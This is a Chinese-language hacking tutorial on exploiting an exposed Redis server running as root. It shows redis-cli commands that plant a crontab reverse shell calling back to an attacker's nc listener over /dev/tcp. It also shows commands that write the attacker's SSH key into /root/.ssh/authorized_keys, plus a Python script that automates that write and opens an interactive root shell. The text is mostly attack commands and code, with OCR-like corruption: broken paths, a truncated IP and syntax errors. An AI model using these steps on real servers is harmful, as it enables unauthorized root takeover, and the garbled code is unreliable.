一、计划任务反弹shell
利用计划任务执行命令反弹shell
在redis以root权限运行时可以写crontab来执行命令反弹shell
注:Linux crontab是用来定期执行程序的命令
先在自己的服务器上监听一个端口
nc -lvnp 7999
然后执行命令:
root@kali :~##redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.12E
192.168.63.130:6379> config set dir /var /spool/cron/
192.168.63.130:6379>config set dbfilename root
192.168.63.130:6379> save
二、写入公钥
1.获取rsa
ssh-keygen -t rsa
2.将公钥写入foo .txt,注意内容前后要加2个换行
(echo -e "\n\n"; cat/root/.ssh/id_rsa.pub; echo -e "\n\n" ) > foo.txt
3.将foo. txt放入键crackit里
cat foo.txt | redis-cli -h IP -x set crackit
4.连接目标
redis-cli -h IP
5.设置目标的redis的配置文件
6.设置数据库备份目录为/root/ .ssh/(存储公钥路径)
192.168.1.11:6379>config set dir /root / .ssh/
OK
7.设置数据库备份文件名为authorized_keys
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
8.此时公钥成功写入目标机子,文件名为authorized_keys
192.168.1.11:6379>save
OK
9.利用私钥链接目标
ssh -i /root/ .ssh/id_rsa root@192.168.1.11
set x "\n\n\n
具体操作可参考:https://www.cnblogs.com/hei-zi/p/14002135.html
10.脚本探测
#coding : utf-8
#redis交互式
#commands: python3 redis_shell ip
import redis
import sys
import paramiko
rsa_pub = '/root/.ssh/id_rsa.pub' #公钥路径
pkey = '/root/.ssh/id_rsa ' #密钥路径
#获取公钥内容
def get_id_rsa_pub( ):
with open(rsa_pub, 'rt ' ) as f:
id_rsa_pub = '\n\n\n{}\n\n'.format ( f.read( ) )
return id_rsa_pub
def shell_redis(ip):
try:
r = redis.Redis(host=ip,port=6379,socket_timeout=5)
r.config_set ( 'dir ' , '/root / .ssh/ ' )
print( '[ok] : config set dir /root/ .ssh/ ' )
r.config_set ( ' dbfilename ' , 'authorized_keys ' )
print( '[ok] : config set dbfilename "authorized_keys" ' )
id_rsa_pub = get_id_rsa_pub()
r.set ( 'crackit ', id_rsa_pub )
print( '[ok] : set crackit ')
r.save()
print ( ' [ok] : save ')
key = paramiko.RSAKey.from_private_key_file(pkey)
ssh = paramiko.SSHClient ( )
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect( ip, port=22,username="root", pkey=key,timeout=5)
ssh_stdin,ssh_stdout,ssh_stderr = ssh.exec_command ( 'id' )
content = ssh_stdout.readlines()
if content :
print ( "[ok] connect to :".format(ip, content[0]))
while True:
command = input(' {} >>> '.format(ip))
ssh_stdin,ssh_stdout,ssh_stderr = ssh.exec_command( command )
contents = ssh_stdout.readlines()
for content in contents:
print ( content )
except Exception as e:
error = e.args
if error == ('',):
error = 'save error'
print('[-] [{}]∶{}}'.format (error,ip))
if __name__= '__main__' :
ip = sys.argv[1]
shell_redis(ip)
|